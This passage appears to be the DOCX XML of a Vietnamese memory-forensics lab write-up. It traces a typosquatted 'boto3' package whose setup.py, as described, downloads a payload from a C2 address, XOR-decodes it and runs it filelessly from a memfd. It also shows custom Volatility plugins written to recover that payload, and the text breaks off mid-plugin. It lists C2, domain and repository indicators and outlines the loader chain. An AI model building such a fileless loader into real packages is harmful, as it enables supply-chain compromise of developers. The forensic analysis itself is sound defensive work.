    <w:p w14:paraId="6C0A090E" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Thực thi Base64 stage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580A51B3" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EED245C" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Kết nối 77.74.198.52:4443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A989938" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3AAAE0" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Tạo anonymous memfd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BA0953" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60048699" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Nhận payload và XOR 0xEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AC866E" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAE048C" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Ghi payload vào /proc/self/fd/4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F15FDB" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F704BD" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Double-fork</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve"> để chạy nền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7D98A2" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19554DC1" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">Thực thi payload </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>fileless</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7894A2DA" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Các artifact quan trọng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793878CE" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Malicious repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067F8188" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:lastRenderedPageBreak/>
        <w:t>https://github.com/bootooo3/boto3.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6498FA46" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380"/>
    <w:p w14:paraId="5BC62E4A" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Stage 1 C2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEAA512" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>77.74.198.52:4443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CB9BBA" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380"/>
    <w:p w14:paraId="0E21EF89" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>XOR key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EF20C1" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>0xEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC8589D" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380"/>
    <w:p w14:paraId="46FC6A55" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Execution path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C881CEA" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>/proc/self/fd/4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCA1545" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380"/>
    <w:p w14:paraId="1F9EF739" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Anonymous inode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307F02A0" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>22758</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13948174" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380"/>
    <w:p w14:paraId="43370400" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Suspicious domain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A14B11" w14:textId="77777777" w:rsidR="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>files.pypi-install.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599139CF" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Vậy từ file setup.py, thấy được payload được tải từ C2, giải mã bằng XOR 0xEF rồi ghi vào anonymous memfd; bước tiếp theo là dùng plugin linux_lsof để xác định file descriptor chứa payload stage 2 của PID 1451.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C67DC98" w14:textId="42A985F3" w:rsidR="00A35380" w:rsidRDefault="00A35380" w:rsidP="00191F7F">
      <w:r w:rsidRPr="00A35380">
        <w:t>vol2 -f dump.mem --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 linux_lsof -p 1451</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAB2A48" w14:textId="77777777" w:rsidR="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r>
        <w:t>Offset             Name                           Pid      FD       Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2081F9A1" w14:textId="77777777" w:rsidR="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>------------------ ------------------------------ -------- -------- -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35525780" w14:textId="77777777" w:rsidR="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r>
        <w:t>0xffff914f6f7ec500 python3                            1451        0 /dev/pts/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F3A450" w14:textId="77777777" w:rsidR="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r>
        <w:t>0xffff914f6f7ec500 python3                            1451        1 /dev/pts/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F37099" w14:textId="77777777" w:rsidR="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r>
        <w:t>0xffff914f6f7ec500 python3                            1451        2 /dev/pts/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C678847" w14:textId="613367C2" w:rsidR="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r>
        <w:t xml:space="preserve">0xffff914f6f7ec500 python3                            1451        4 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/:[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>22758]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54822ECF" w14:textId="2161DA91" w:rsidR="00191F7F" w:rsidRDefault="00ED01AE" w:rsidP="00191F7F">
      <w:r w:rsidRPr="00ED01AE">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Vậy PID 1451 đang giữ một anonymous file tại FD 4, có inode 22758; </w:t>
      </w:r>
      <w:r>
        <w:t>khả năng</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve"> là memfd chứa payload stage 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BFFA53" w14:textId="33CD812F" w:rsidR="00191F7F" w:rsidRDefault="00ED01AE" w:rsidP="00191F7F">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">Do `22758` chỉ là inode number, cần lấy địa chỉ `struct inode` tương ứng trong kernel memory. Vì anonymous memfd không có pathname thông thường, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vậy viết </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>một plugin duyệt FD 4 của PID 1451 và lấy trực tiếp địa chỉ inode</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C77950A" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t>cat &gt; ~/tools/volatility/volatility/plugins/linux/fd1451.py &lt;&lt;'PY'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C3ECED" w14:textId="681DAB66" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>volatility.plugins</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>linux.pslist</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve"> as linux_pslist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6F6011" w14:textId="695E778F" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t>class linux_fd1451(linux_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>pslist.linux</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>_pslist):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C56DF4" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">    def calculate(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1517F432" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">        for task in linux_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>pslist.linux</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>pslist.calculate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FFF1BD" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">            if int(task.pid</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>) !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>= 1451:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE9B5C1" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">                continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EE7BA4" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE"/>
    <w:p w14:paraId="6F0A03D7" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">            for filp, fd in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>task.lsof</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4230F6" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">                if int(fd) == 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5D2FE5" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">                    inode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>filp.dentry</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>.d_inode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E035F00" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">                    yield inode.obj_offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026051C1" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE"/>
    <w:p w14:paraId="442D08EB" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">    def render_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>text(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>self, outfd, data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBBF4DF" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">        for inode_addr in data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BADBCCB" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>outfd.write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333090E9" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">                "INODE_ADDR=0x{0:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>x}\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>".format</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED01AE">
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69341A53" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">                    int(inode_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE2E0A2" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">                )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D071B5" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRPr="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A6F1D6" w14:textId="77777777" w:rsidR="00ED01AE" w:rsidRDefault="00ED01AE" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00ED01AE">
        <w:t>PY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431DAA74" w14:textId="12A99BB3" w:rsidR="00C71B06" w:rsidRDefault="00C71B06" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00C71B06">
        <w:t xml:space="preserve">vol2 -f </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C71B06">
        <w:t>dump.mem --</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C71B06">
        <w:t>profile=LinuxUbuntu_4_15_0-184-generic_profilex64 linux_fd1451</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD0F97B" w14:textId="2FFFE3D8" w:rsidR="00C71B06" w:rsidRPr="00ED01AE" w:rsidRDefault="00C71B06" w:rsidP="00ED01AE">
      <w:r w:rsidRPr="00C71B06">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06D4B4A2" wp14:editId="2C0ED380">
            <wp:extent cx="5943600" cy="2309495"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4478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57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5203" w14:textId="77777777" w:rsidR="00C71B06" w:rsidRPr="00C71B06" w:rsidRDefault="00C71B06" w:rsidP="00C71B06">
      <w:r w:rsidRPr="00C71B06">
        <w:t>Cuối cùng lấy được 0xffff914f7c168870 là địa chỉ struct inode của anonymous file tại FD 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5A3859" w14:textId="33071093" w:rsidR="00C71B06" w:rsidRDefault="00C71B06" w:rsidP="00C71B06">
      <w:r w:rsidRPr="00C71B06">
        <w:t xml:space="preserve">Tiếp tục dùng lại plugin linux_find_file với địa chỉ inode này để trích xuất payload stage 2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DDAE3E" w14:textId="542B7A0B" w:rsidR="00C71B06" w:rsidRDefault="00C71B06" w:rsidP="00C71B06">
      <w:r w:rsidRPr="00C71B06">
        <w:t>vol2 -f dump.mem --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 linux_find_file -i 0xffff914f7c168870 -O recover/fd4.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9FFC64" w14:textId="7162695E" w:rsidR="00C71B06" w:rsidRDefault="00C71B06" w:rsidP="00C71B06">
      <w:r w:rsidRPr="00C71B06">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6771259F" wp14:editId="7CBB0BD3">
            <wp:extent cx="5943600" cy="1908175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="172560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06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0219" w14:textId="77777777" w:rsidR="00C71B06" w:rsidRPr="00C71B06" w:rsidRDefault="00C71B06" w:rsidP="00C71B06">
      <w:r w:rsidRPr="00C71B06">
        <w:t>Dump ra nhưng file thực chất chỉ rỗng, vì linux_find_file không đọc được các memory page của anonymous memfd. Do đó cần viết plugin riêng để lấy trực tiếp inode từ FD 4 và dump các page của payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5BB405" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t>cat &gt; ~/tools/volatility/volatility/plugins/linux/dump_fd.py &lt;&lt;'PY'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65161841" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>volatility.plugins</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>linux.find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>_file as find_file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9E7BA5" w14:textId="33C7BB7E" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>volatility.plugins</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>linux.pslist</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve"> as pslist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FA4542" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t>class linux_dump_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>fd(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>find_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>file.linux</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">_find_file, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>pslist.linux</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>_pslist):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3FA010" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C"/>
    <w:p w14:paraId="4FEC4A4C" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">    def __init_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>_(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>self, config, *args, **kwargs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EB2BB3" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        find_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>file.linux</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>_find_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>file._</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>_init_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>_(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>self, config, *args, **kwargs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F84B57" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
